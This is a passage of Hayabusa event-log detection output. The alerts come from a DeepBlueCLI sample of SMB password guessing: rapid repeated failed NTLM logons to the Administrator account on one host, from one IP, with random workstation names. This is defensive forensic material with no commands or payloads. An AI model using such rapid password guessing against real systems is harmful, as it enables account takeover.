NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: 